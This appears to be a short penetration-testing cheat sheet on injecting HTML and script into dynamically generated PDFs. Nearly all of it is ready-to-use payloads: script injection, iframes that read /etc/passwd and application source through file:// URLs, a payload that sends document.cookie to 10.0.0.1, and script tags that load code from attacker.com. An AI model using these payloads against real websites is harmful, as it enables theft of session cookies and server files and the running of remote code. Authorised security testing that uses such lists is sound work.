XSS with Dynamic PDF
Last modified: 2023-02-21
If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.
Exploitation
Here insert the payload into POST params.
Basic
<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>
Path Disclosure
<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>
LFI/RFI
<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
Cookie Hijacking
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">
External Scripts
<script src="http://attacker.com/test.js"></script>
<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />